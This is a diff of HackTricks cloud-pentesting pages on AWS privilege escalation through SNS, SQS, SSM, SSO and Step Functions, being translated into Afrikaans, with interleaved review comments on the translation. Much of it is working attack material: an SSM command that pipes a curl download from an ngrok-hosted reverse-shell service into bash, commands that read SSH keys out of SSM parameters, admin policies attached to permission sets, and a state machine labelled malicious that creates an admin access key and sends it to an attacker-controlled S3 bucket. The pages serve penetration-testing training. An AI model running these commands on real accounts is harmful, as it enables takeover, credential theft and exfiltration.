@@ -12,36 +12,26 @@ For more information check: ### `sns:Publish` -An attacker could send malicious or unwanted messages to the SNS topic, potentially causing data corruption, triggering unintended actions, or exhausting resources. - +'n Aanvaller kan kwaadwillige of ongewenste boodskappe na die SNS-tema stuur, wat moontlik datakorruptie kan veroorsaak, onbedoelde aksies kan ontketen, of hulpbronne kan uitput. ```bash aws sns publish --topic-arn --message ``` - -**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion. +**PotensiĂ«le Impak**: Kwetsbaarheid benutting, Data korrupsie, onbedoelde aksies, of hulpbron uitputting. ### `sns:Subscribe` -An attacker could subscribe or to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic. - +'n Aanvaller kan inteken op 'n SNS onderwerp, wat moontlik ongeoorloofde toegang tot boodskappe verleen of die normale funksionering van toepassings wat op die onderwerp staatmaak, ontwrig. ```bash aws sns subscribe --topic-arn --protocol --endpoint ``` - -**Potential Impact**: Unauthorized access to messages (sensitve info), service disruption for applications relying on the affected topic. +**PotensiĂ«le Impak**: Onbevoegde toegang tot boodskappe (sensitiewe inligting), diensonderbreking vir toepassings wat op die betrokke onderwerp staatmaak. ### `sns:AddPermission` -An attacker could grant unauthorized users or services access to an SNS topic, potentially getting further permissions. - +'n Aanvaller kan onbevoegde gebruikers of dienste toegang tot 'n SNS-onderwerp verleen, wat moontlik verdere toestemmings kan verkry. 
```css aws sns add-permission --topic-arn --label --aws-account-id --action-name ``` - -**Potential Impact**: Unauthorized access to the topic, message exposure, or topic manipulation by unauthorized users or services, disruption of normal functioning for applications relying on the topic. +**PotensiĂ«le Impak**: Onbevoegde toegang tot die onderwerp, boodskapblootstelling, of onderwerp manipulasie deur onbevoegde gebruikers of dienste, onderbreking van normale funksionering vir toepassings wat op die onderwerp staatmaak. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md index 384ed8430..54beb5022 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md @@ -4,7 +4,7 @@ ## SQS -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-sqs-and-sns-enum.md 
@@ -12,39 +12,29 @@ For more information check: ### `sqs:AddPermission` -An attacker could use this permission to grant unauthorized users or services access to an SQS queue by creating new policies or modifying existing policies. This could result in unauthorized access to the messages in the queue or manipulation of the queue by unauthorized entities. - +'n Aanvaller kan hierdie toestemming gebruik om ongemagtigde gebruikers of dienste toegang tot 'n SQS-ry te gee deur nuwe beleide te skep of bestaande beleide te wysig. Dit kan lei tot ongemagtigde toegang tot die boodskappe in die ry of manipulasie van die ry deur ongemagtigde entiteite. ```bash cssCopy codeaws sqs add-permission --queue-url --actions --aws-account-ids --label ``` - -**Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services. +**PotensiĂ«le Impak**: Onbevoegde toegang tot die lys, boodskap blootstelling, of lys manipulasie deur onbevoegde gebruikers of dienste. ### `sqs:SendMessage` , `sqs:SendMessageBatch` -An attacker could send malicious or unwanted messages to the SQS queue, potentially causing data corruption, triggering unintended actions, or exhausting resources. - +'n Aanvaller kan kwaadwillige of ongewenste boodskappe na die SQS-lys stuur, wat moontlik data korrupsie kan veroorsaak, onbedoelde aksies kan ontketen, of hulpbronne kan uitput. ```bash aws sqs send-message --queue-url --message-body aws sqs send-message-batch --queue-url --entries ``` - -**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion. +**PotensiĂ«le Impak**: Kwetsbaarheid benutting, Data korrupsie, onbedoelde aksies, of hulpbron uitputting. 
### `sqs:ReceiveMessage`, `sqs:DeleteMessage`, `sqs:ChangeMessageVisibility` -An attacker could receive, delete, or modify the visibility of messages in an SQS queue, causing message loss, data corruption, or service disruption for applications relying on those messages. - +'n Aanvaller kan boodskappe in 'n SQS-ry ontvang, verwyder of die sigbaarheid van boodskappe verander, wat kan lei tot boodskapverlies, datakorrupsie, of diensonderbreking vir toepassings wat op daardie boodskappe staatmaak. ```bash aws sqs receive-message --queue-url aws sqs delete-message --queue-url --receipt-handle aws sqs change-message-visibility --queue-url --receipt-handle --visibility-timeout ``` - -**Potential Impact**: Steal sensitive information, Message loss, data corruption, and service disruption for applications relying on the affected messages. +**PotensiĂ«le Impak**: Steel sensitiewe inligting, Boodskapverlies, datakorruptie, en diensonderbreking vir toepassings wat op die geraakte boodskappe staatmaak. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md index c4067e2ca..4f40bf7d5 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md @@ -4,7 +4,7 @@ ## SSM -For more info about SSM check: +Vir meer inligting oor SSM, kyk: {{#ref}} ../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ 
@@ -12,8 +12,7 @@ For more info about SSM check: ### `ssm:SendCommand` -An attacker with the permission **`ssm:SendCommand`** can **execute commands in instances** running the Amazon SSM Agent and **compromise the IAM Role** running inside of it. - +'n Aanvaller met die toestemming **`ssm:SendCommand`** kan **opdragte uitvoer in instansies** wat die Amazon SSM Agent draai en **die IAM Rol** wat binne dit loop, **kompromitteer**. ```bash # Check for configured instances aws ssm describe-instance-information 
@@ -21,26 +20,22 @@ aws ssm describe-sessions --state Active # Send rev shell command aws ssm send-command --instance-ids "$INSTANCE_ID" \ - --document-name "AWS-RunShellScript" --output text \ - --parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash" +--document-name "AWS-RunShellScript" --output text \ +--parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash" ``` - -In case you are using this technique to escalate privileges inside an already compromised EC2 instance, you could just capture the rev shell locally with: - +In die geval dat jy hierdie tegniek gebruik om voorregte te verhoog binne 'n reeds gecompromitteerde EC2-instansie, kan jy net die rev shell plaaslik vang met: ```bash # If you are in the machine you can capture the reverseshel inside of it nc -lvnp 4444 #Inside the EC2 instance aws ssm send-command --instance-ids "$INSTANCE_ID" \ - --document-name "AWS-RunShellScript" --output text \ - --parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash" +--document-name "AWS-RunShellScript" --output text \ +--parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash" ``` - -**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running. +**PotensiĂ«le Impak:** Direkte privesc na die EC2 IAM rolle wat aan lopende instansies met SSM Agents gekoppel is. ### `ssm:StartSession` -An attacker with the permission **`ssm:StartSession`** can **start a SSH like session in instances** running the Amazon SSM Agent and **compromise the IAM Role** running inside of it. - +'n Aanvaller met die toestemming **`ssm:StartSession`** kan **'n SSH-agtige sessie in instansies** wat die Amazon SSM Agent draai, **begin en die IAM Rol** wat binne dit loop, **kompromitteer**. ```bash # Check for configured instances aws ssm describe-instance-information 
@@ -49,68 +44,58 @@ aws ssm describe-sessions --state Active # Send rev shell command aws ssm start-session --target "$INSTANCE_ID" ``` - > [!CAUTION] -> In order to start a session you need the **SessionManagerPlugin** installed: [https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html](https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html) +> Om 'n sessie te begin, moet jy die **SessionManagerPlugin** geĂŻnstalleer hĂȘ: [https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html](https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html) -**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running. +**PotensiĂ«le Impak:** Direkte privesc na die EC2 IAM rolle wat aan lopende instansies met SSM Agents gekoppel is. -#### Privesc to ECS - -When **ECS tasks** run with **`ExecuteCommand` enabled** users with enough permissions can use `ecs execute-command` to **execute a command** inside the container.\ -According to [**the documentation**](https://aws.amazon.com/blogs/containers/new-using-amazon-ecs-exec-access-your-containers-fargate-ec2/) this is done by creating a secure channel between the device you use to initiate the “_exec_“ command and the target container with SSM Session Manager. 
(SSM Session Manager Plugin necesary for this to work)\ -Therefore, users with `ssm:StartSession` will be able to **get a shell inside ECS tasks** with that option enabled just running: +#### Privesc na ECS +Wanneer **ECS take** met **`ExecuteCommand` geaktiveer** loop, kan gebruikers met genoeg regte `ecs execute-command` gebruik om **'n opdrag** binne die houer uit te voer.\ +Volgens [**die dokumentasie**](https://aws.amazon.com/blogs/containers/new-using-amazon-ecs-exec-access-your-containers-fargate-ec2/) word dit gedoen deur 'n veilige kanaal te skep tussen die toestel wat jy gebruik om die “_exec_“ opdrag te begin en die teikenhouer met SSM Session Manager. (SSM Session Manager Plugin is nodig vir dit om te werk)\ +Daarom sal gebruikers met `ssm:StartSession` in staat wees om **'n shell binne ECS take** te verkry met daardie opsie geaktiveer deur net te loop: ```bash aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID" ``` - ![](<../../../images/image (185).png>) -**Potential Impact:** Direct privesc to the `ECS`IAM roles attached to running tasks with `ExecuteCommand` enabled. +**PotensiĂ«le Impak:** Direkte privesc na die `ECS` IAM rolle wat aan lopende take met `ExecuteCommand` geaktiveer is, geheg is. ### `ssm:ResumeSession` -An attacker with the permission **`ssm:ResumeSession`** can re-**start a SSH like session in instances** running the Amazon SSM Agent with a **disconnected** SSM session state and **compromise the IAM Role** running inside of it. - +'n Aanvaller met die toestemming **`ssm:ResumeSession`** kan 'n **SSH-agtige sessie in instances** wat die Amazon SSM Agent draai met 'n **afgekoppelde** SSM sessietoestand herbegin en **die IAM Rol** wat binne dit draai, kompromitteer. 
```bash # Check for configured instances aws ssm describe-sessions # Get resume data (you will probably need to do something else with this info to connect) aws ssm resume-session \ - --session-id Mary-Major-07a16060613c408b5 +--session-id Mary-Major-07a16060613c408b5 ``` - -**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running and disconected sessions. +**PotensiĂ«le Impak:** Direkte privesc na die EC2 IAM rolle wat aan lopende instansies met SSM Agents wat loop en ontkoppelde sessies geheg is. ### `ssm:DescribeParameters`, (`ssm:GetParameter` | `ssm:GetParameters`) -An attacker with the mentioned permissions is going to be able to list the **SSM parameters** and **read them in clear-text**. In these parameters you can frequently **find sensitive information** such as SSH keys or API keys. - +'n Aanvaller met die genoemde toestemmings gaan in staat wees om die **SSM parameters** te lys en **dit in duidelike teks te lees**. In hierdie parameters kan jy dikwels **sensitiewe inligting** soos SSH sleutels of API sleutels vind. ```bash aws ssm describe-parameters # Suppose that you found a parameter called "id_rsa" aws ssm get-parameters --names id_rsa --with-decryption aws ssm get-parameter --name id_rsa --with-decryption ``` - -**Potential Impact:** Find sensitive information inside the parameters. +**PotensiĂ«le Impak:** Vind sensitiewe inligting binne die parameters. ### `ssm:ListCommands` -An attacker with this permission can list all the **commands** sent and hopefully find **sensitive information** on them. - +'n Aanvaller met hierdie toestemming kan al die **opdragte** lys wat gestuur is en hoopvol **sensitiewe inligting** daarop vind. ``` aws ssm list-commands ``` - -**Potential Impact:** Find sensitive information inside the command lines. +**PotensiĂ«le Impak:** Vind sensitiewe inligting binne die opdraglyne. 
### `ssm:GetCommandInvocation`, (`ssm:ListCommandInvocations` | `ssm:ListCommands`) -An attacker with these permissions can list all the **commands** sent and **read the output** generated hopefully finding **sensitive information** on it. - +'n Aanvaller met hierdie toestemmings kan al die **opdragte** lys wat gestuur is en **die uitvoer** lees wat gegenereer is, in die hoop om **sensitiewe inligting** daarop te vind. ```bash # You can use any of both options to get the command-id and instance id aws ssm list-commands @@ -118,19 +103,14 @@ aws ssm list-command-invocations aws ssm get-command-invocation --command-id --instance-id ``` - -**Potential Impact:** Find sensitive information inside the output of the command lines. +**PotensiĂ«le Impak:** Vind sensitiewe inligting binne die uitvoer van die opdraglyne. ### Codebuild -You can also use SSM to get inside a codebuild project being built: +Jy kan ook SSM gebruik om binne 'n codebuild projek wat gebou word, te kom: {{#ref}} aws-codebuild-privesc.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md index 0fb4e10a1..9967e41fa 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md 
@@ -4,58 +4,53 @@ ## AWS Identity Center / AWS SSO -For more information about AWS Identity Center / AWS SSO check: +Vir meer inligting oor AWS Identity Center / AWS SSO kyk: {{#ref}} ../aws-services/aws-iam-enum.md {{#endref}} > [!WARNING] -> Note that by **default**, only **users** with permissions **form** the **Management Account** are going to be able to access and **control the IAM Identity Center**.\ -> Users from other accounts can only allow it if the account is a **Delegated Adminstrator.**\ -> [Check the docs for more info.](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html) +> Let daarop dat slegs **gebruikers** met **toestemmings** van die **Bestuursrekening** toegang sal hĂȘ tot en **beheer oor die IAM Identity Center** sal hĂȘ.\ +> Gebruikers van ander rekeninge kan dit slegs toelaat as die rekening 'n **Gedelegeerde Administrateur** is.\ +> [Kyk die dokumentasie vir meer inligting.](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html) -### ~~Reset Password~~ +### ~~Reset Wagtwoord~~ -An easy way to escalate privileges in cases like this one would be to have a permission that allows to reset users passwords. Unfortunately it's only possible to send an email to the user to reset his password, so you would need access to the users email. +'n Maklike manier om voorregte te verhoog in gevalle soos hierdie, sou wees om 'n toestemming te hĂȘ wat toelaat om gebruikers se wagwoorde te reset. Ongelukkig is dit slegs moontlik om 'n e-pos aan die gebruiker te stuur om sy wagwoord te reset, so jy sal toegang tot die gebruiker se e-pos nodig hĂȘ. ### `identitystore:CreateGroupMembership` -With this permission it's possible to set a user inside a group so he will inherit all the permissions the group has. - +Met hierdie toestemming is dit moontlik om 'n gebruiker binne 'n groep te plaas sodat hy al die toestemmings wat die groep het, sal erf. 
```bash aws identitystore create-group-membership --identity-store-id --group-id --member-id UserId= ``` - ### `sso:PutInlinePolicyToPermissionSet`, `sso:ProvisionPermissionSet` -An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control - +'n Aanvaller met hierdie toestemming kan ekstra toestemmings toeken aan 'n Toestemmingstel wat aan 'n gebruiker onder sy beheer toegeken is. ```bash # Set an inline policy with admin privileges aws sso-admin put-inline-policy-to-permission-set --instance-arn --permission-set-arn --inline-policy file:///tmp/policy.yaml # Content of /tmp/policy.yaml { - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "Statement1", - "Effect": "Allow", - "Action": ["*"], - "Resource": ["*"] - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Sid": "Statement1", +"Effect": "Allow", +"Action": ["*"], +"Resource": ["*"] +} +] } # Update the provisioning so the new policy is created in the account aws sso-admin provision-permission-set --instance-arn --permission-set-arn --target-type ALL_PROVISIONED_ACCOUNTS ``` - ### `sso:AttachManagedPolicyToPermissionSet`, `sso:ProvisionPermissionSet` -An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control - +'n Aanvaller met hierdie toestemming kan ekstra toestemmings toeken aan 'n Toestemmingstel wat aan 'n gebruiker onder sy beheer toegeken is. ```bash # Set AdministratorAccess policy to the permission set aws sso-admin attach-managed-policy-to-permission-set --instance-arn --permission-set-arn --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess" 
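Review bot: the translated warning drops the qualifier `by default` from `Note that by **default**, only **users** with permissions ... the **Management Account** ...`; `Let daarop dat slegs **gebruikers** ...` states it as an absolute, which sits oddly next to the following sentence about delegated administrators. Suggest `Let daarop dat, by verstek, slegs ...`. The same sentence also repeats `sal hĂȘ` (`toegang sal hĂȘ tot en beheer oor ... sal hĂȘ`); one occurrence is enough. The inline policy JSON under `# Content of /tmp/policy.yaml` has also had its indentation stripped; the fenced content was not translated, so it should keep its original indentation.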
@@ -63,14 +58,12 @@ aws sso-admin attach-managed-policy-to-permission-set --instance-arn --permission-set-arn --target-type ALL_PROVISIONED_ACCOUNTS ``` - ### `sso:AttachCustomerManagedPolicyReferenceToPermissionSet`, `sso:ProvisionPermissionSet` -An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control. +'n Aanvaller met hierdie toestemming kan ekstra toestemmings toeken aan 'n Toestemmingstel wat aan 'n gebruiker onder sy beheer toegeken is. > [!WARNING] -> To abuse these permissions in this case you need to know the **name of a customer managed policy that is inside ALL the accounts** that are going to be affected. - +> Om hierdie toestemmings in hierdie geval te misbruik, moet jy die **naam van 'n klantbestuurde beleid weet wat binne AL die rekeninge is** wat geraak gaan word. ```bash # Set AdministratorAccess policy to the permission set aws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn --permission-set-arn --customer-managed-policy-reference 
@@ -78,59 +71,42 @@ aws sso-admin attach-customer-managed-policy-reference-to-permission-set --insta # Update the provisioning so the new policy is created in the account aws sso-admin provision-permission-set --instance-arn --permission-set-arn --target-type ALL_PROVISIONED_ACCOUNTS ``` - ### `sso:CreateAccountAssignment` -An attacker with this permission could give a Permission Set to a user under his control to an account. - +'n Aanvaller met hierdie toestemming kan 'n Toestemmingstel aan 'n gebruiker onder sy beheer toeken aan 'n rekening. ```bash aws sso-admin create-account-assignment --instance-arn --target-id --target-type AWS_ACCOUNT --permission-set-arn --principal-type USER --principal-id ``` - ### `sso:GetRoleCredentials` -Returns the STS short-term credentials for a given role name that is assigned to the user. - +Gee die STS korttermyn geloofsbriewe vir 'n gegewe rolnaam wat aan die gebruiker toegeken is. ``` aws sso get-role-credentials --role-name --account-id --access-token ``` - However, you need an access token that I'm not sure how to get (TODO). ### `sso:DetachManagedPolicyFromPermissionSet` -An attacker with this permission can remove the association between an AWS managed policy from the specified permission set. It is possible to grant more privileges via **detaching a managed policy (deny policy)**. - +'n Aanvaller met hierdie toestemming kan die assosiasie tussen 'n AWS bestuurde beleid en die gespesifiseerde toestemmingstel verwyder. Dit is moontlik om meer voorregte toe te ken deur **'n bestuurde beleid (weier beleid)** te ontkoppel. ```bash aws sso-admin detach-managed-policy-from-permission-set --instance-arn --permission-set-arn --managed-policy-arn ``` - ### `sso:DetachCustomerManagedPolicyReferenceFromPermissionSet` -An attacker with this permission can remove the association between a Customer managed policy from the specified permission set. It is possible to grant more privileges via **detaching a managed policy (deny policy)**. 
- +'n Aanvaller met hierdie toestemming kan die assosiasie tussen 'n kliĂ«nt bestuurde beleid en die gespesifiseerde toestemmingset verwyder. Dit is moontlik om meer voorregte toe te ken deur **'n bestuurde beleid te ontkoppel (weier beleid)**. ```bash aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn --permission-set-arn --customer-managed-policy-reference ``` - ### `sso:DeleteInlinePolicyFromPermissionSet` -An attacker with this permission can action remove the permissions from an inline policy from the permission set. It is possible to grant **more privileges via detaching an inline policy (deny policy)**. - +'n Aanvaller met hierdie toestemming kan die toestemmings uit 'n inline beleid van die toestemmingset verwyder. Dit is moontlik om **meer voorregte te verleen deur 'n inline beleid (weier beleid) te ontkoppel**. ```bash aws sso-admin delete-inline-policy-from-permission-set --instance-arn --permission-set-arn ``` - ### `sso:DeletePermissionBoundaryFromPermissionSet` -An attacker with this permission can remove the Permission Boundary from the permission set. It is possible to grant **more privileges by removing the restrictions on the Permission Set** given from the Permission Boundary. - +'n Aanvaller met hierdie toestemming kan die Permission Boundary uit die toestemmingstel verwyder. Dit is moontlik om **meer bevoegdhede te verleen deur die beperkings op die Permission Set** wat van die Permission Boundary gegee is, te verwyder. ```bash aws sso-admin delete-permissions-boundary-from-permission-set --instance-arn --permission-set-arn ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md index bfc3adb77..c17eef980 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md 
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md @@ -4,73 +4,66 @@ ## Step Functions -For more information about this AWS service, check: +Vir meer inligting oor hierdie AWS-diens, kyk: {{#ref}} ../aws-services/aws-stepfunctions-enum.md {{#endref}} -### Task Resources +### Taak Hulpbronne -These privilege escalation techniques are going to require to use some AWS step function resources in order to perform the desired privilege escalation actions. +Hierdie voorregverhogingstegnieke gaan vereis dat jy 'n paar AWS stapfunksie hulpbronne gebruik om die verlangde voorregverhogingsaksies uit te voer. -In order to check all the possible actions, you could go to your own AWS account select the action you would like to use and see the parameters it's using, like in: +Om al die moontlike aksies te kontroleer, kan jy na jou eie AWS-rekening gaan, die aksie kies wat jy wil gebruik en die parameters wat dit gebruik, soos in:
-Or you could also go to the API AWS documentation and check each action docs: +Of jy kan ook na die API AWS-dokumentasie gaan en elke aksiedokumentasie nagaan: - [**AddUserToGroup**](https://docs.aws.amazon.com/IAM/latest/APIReference/API_AddUserToGroup.html) - [**GetSecretValue**](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html) ### `states:TestState` & `iam:PassRole` -An attacker with the **`states:TestState`** & **`iam:PassRole`** permissions can test any state and pass any IAM role to it without creating or updating an existing state machine, enabling unauthorized access to other AWS services with the roles' permissions. potentially. Combined, these permissions can lead to extensive unauthorized actions, from manipulating workflows to alter data to data breaches, resource manipulation, and privilege escalation. - +'n Aanvaller met die **`states:TestState`** & **`iam:PassRole`** toestemmings kan enige toestand toets en enige IAM-rol daaraan oorplaas sonder om 'n bestaande toestandsmasjien te skep of op te dateer, wat ongeoorloofde toegang tot ander AWS-dienste met die rolle se toestemmings moontlik maak. Saam kan hierdie toestemmings lei tot uitgebreide ongeoorloofde aksies, van die manipulasie van werksvloeie tot die verandering van data, datalekke, hulpbronmanipulasie en voorregverhoging. ```bash aws states test-state --definition --role-arn [--input ] [--inspection-level ] [--reveal-secrets | --no-reveal-secrets] ``` - -The following examples show how to test an state that creates an access key for the **`admin`** user leveraging these permissions and a permissive role of the AWS environment. 
This permissive role should have any high-privileged policy associated with it (for example **`arn:aws:iam::aws:policy/AdministratorAccess`**) that allows the state to perform the **`iam:CreateAccessKey`** action: +Die volgende voorbeelde wys hoe om 'n toestand te toets wat 'n toegangsleutel vir die **`admin`** gebruiker skep deur gebruik te maak van hierdie toestemmings en 'n toegeeflike rol van die AWS-omgewing. Hierdie toegeeflike rol moet enige hoĂ«-bevoegdheid beleid geassosieer met dit hĂȘ (byvoorbeeld **`arn:aws:iam::aws:policy/AdministratorAccess`**) wat toelaat dat die toestand die **`iam:CreateAccessKey`** aksie uitvoer: - **stateDefinition.json**: - ```json { - "Type": "Task", - "Parameters": { - "UserName": "admin" - }, - "Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey", - "End": true +"Type": "Task", +"Parameters": { +"UserName": "admin" +}, +"Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey", +"End": true } ``` - -- **Command** executed to perform the privesc: - +- **Opdrag** uitgevoer om die privesc te doen: ```bash aws stepfunctions test-state --definition file://stateDefinition.json --role-arn arn:aws:iam:::role/PermissiveRole { - "output": "{ - \"AccessKey\":{ - \"AccessKeyId\":\"AKIA1A2B3C4D5E6F7G8H\", - \"CreateDate\":\"2024-07-09T16:59:11Z\", - \"SecretAccessKey\":\"1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j\", - \"Status\":\"Active\", - \"UserName\":\"admin\" - } - }", - "status": "SUCCEEDED" +"output": "{ +\"AccessKey\":{ +\"AccessKeyId\":\"AKIA1A2B3C4D5E6F7G8H\", +\"CreateDate\":\"2024-07-09T16:59:11Z\", +\"SecretAccessKey\":\"1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j\", +\"Status\":\"Active\", +\"UserName\":\"admin\" +} +}", +"status": "SUCCEEDED" } ``` - -**Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches. 
+**PotensiĂ«le Impak**: Onbevoegde uitvoering en manipulasie van werksvloeie en toegang tot sensitiewe hulpbronne, wat moontlik kan lei tot beduidende sekuriteitsbreuke. ### `states:CreateStateMachine` & `iam:PassRole` & (`states:StartExecution` | `states:StartSyncExecution`) -An attacker with the **`states:CreateStateMachine`**& **`iam:PassRole`** would be able to create an state machine and provide to it any IAM role, enabling unauthorized access to other AWS services with the roles' permissions. In contrast with the previous privesc technique (**`states:TestState`** & **`iam:PassRole`**), this one does not execute by itself, you will also need to have the **`states:StartExecution`** or **`states:StartSyncExecution`** permissions (**`states:StartSyncExecution`** is **not available for standard workflows**, **just to express state machines**) in order to start and execution over the state machine. - +'n Aanvaller met die **`states:CreateStateMachine`**& **`iam:PassRole`** sou in staat wees om 'n staatmasjien te skep en enige IAM-rol aan dit te verskaf, wat onbevoegde toegang tot ander AWS-dienste met die rolle se toestemmings moontlik maak. In teenstelling met die vorige privesc tegniek (**`states:TestState`** & **`iam:PassRole`**), voer hierdie een nie self uit nie; jy sal ook die **`states:StartExecution`** of **`states:StartSyncExecution`** toestemmings nodig hĂȘ (**`states:StartSyncExecution`** is **nie beskikbaar vir standaard werksvloeie nie**, **net om staatmasjiene uit te druk**) om 'n uitvoering oor die staatmasjien te begin. ```bash # Create a state machine aws states create-state-machine --name --definition --role-arn [--type ] [--logging-configuration ]\ 
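Review bot: `**just to express state machines**` refers to the Express workflow type of Step Functions, but the translation `**net om staatmasjiene uit te druk**` renders `express` as the verb "to express/print", which changes the meaning; suggest `net vir Express-toestandsmasjiene`, keeping `Express` as the product term. The hunk also alternates between `toestandsmasjien`, `toestandmasjien` and `staatmasjien` for `state machine`; pick one and use it throughout the file. The `stateDefinition.json` block and the CLI output under it have had their indentation removed, which makes the JSON harder to read for no translation benefit.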
@@ -82,176 +75,157 @@ aws states start-execution --state-machine-arn [--name ] [--input # Start a Synchronous Express state machine execution aws states start-sync-execution --state-machine-arn [--name ] [--input ] [--trace-header ] ``` - -The following examples show how to create an state machine that creates an access key for the **`admin`** user and exfiltrates this access key to an attacker-controlled S3 bucket, leveraging these permissions and a permissive role of the AWS environment. This permissive role should have any high-privileged policy associated with it (for example **`arn:aws:iam::aws:policy/AdministratorAccess`**) that allows the state machine to perform the **`iam:CreateAccessKey`** & **`s3:putObject`** actions. +Die volgende voorbeelde toon hoe om 'n toestandsmasjien te skep wat 'n toegangsleutel vir die **`admin`** gebruiker skep en hierdie toegangsleutel na 'n aanvaller-beheerde S3-bucket uit te voer, terwyl hierdie toestemmings en 'n toelaatbare rol van die AWS-omgewing benut word. Hierdie toelaatbare rol moet enige hoĂ«-privilege beleid geassosieer met dit hĂȘ (byvoorbeeld **`arn:aws:iam::aws:policy/AdministratorAccess`**) wat die toestandsmasjien toelaat om die **`iam:CreateAccessKey`** & **`s3:putObject`** aksies uit te voer. 
- **stateMachineDefinition.json**: - ```json { - "Comment": "Malicious state machine to create IAM access key and upload to S3", - "StartAt": "CreateAccessKey", - "States": { - "CreateAccessKey": { - "Type": "Task", - "Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey", - "Parameters": { - "UserName": "admin" - }, - "ResultPath": "$.AccessKeyResult", - "Next": "PrepareS3PutObject" - }, - "PrepareS3PutObject": { - "Type": "Pass", - "Parameters": { - "Body.$": "$.AccessKeyResult.AccessKey", - "Bucket": "attacker-controlled-S3-bucket", - "Key": "AccessKey.json" - }, - "ResultPath": "$.S3PutObjectParams", - "Next": "PutObject" - }, - "PutObject": { - "Type": "Task", - "Resource": "arn:aws:states:::aws-sdk:s3:putObject", - "Parameters": { - "Body.$": "$.S3PutObjectParams.Body", - "Bucket.$": "$.S3PutObjectParams.Bucket", - "Key.$": "$.S3PutObjectParams.Key" - }, - "End": true - } - } +"Comment": "Malicious state machine to create IAM access key and upload to S3", +"StartAt": "CreateAccessKey", +"States": { +"CreateAccessKey": { +"Type": "Task", +"Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey", +"Parameters": { +"UserName": "admin" +}, +"ResultPath": "$.AccessKeyResult", +"Next": "PrepareS3PutObject" +}, +"PrepareS3PutObject": { +"Type": "Pass", +"Parameters": { +"Body.$": "$.AccessKeyResult.AccessKey", +"Bucket": "attacker-controlled-S3-bucket", +"Key": "AccessKey.json" +}, +"ResultPath": "$.S3PutObjectParams", +"Next": "PutObject" +}, +"PutObject": { +"Type": "Task", +"Resource": "arn:aws:states:::aws-sdk:s3:putObject", +"Parameters": { +"Body.$": "$.S3PutObjectParams.Body", +"Bucket.$": "$.S3PutObjectParams.Bucket", +"Key.$": "$.S3PutObjectParams.Key" +}, +"End": true +} +} } ``` - -- **Command** executed to **create the state machine**: - +- **Opdrag** uitgevoer om die **toestandmasjien** te **skep**: ```bash aws stepfunctions create-state-machine --name MaliciousStateMachine --definition file://stateMachineDefinition.json --role-arn 
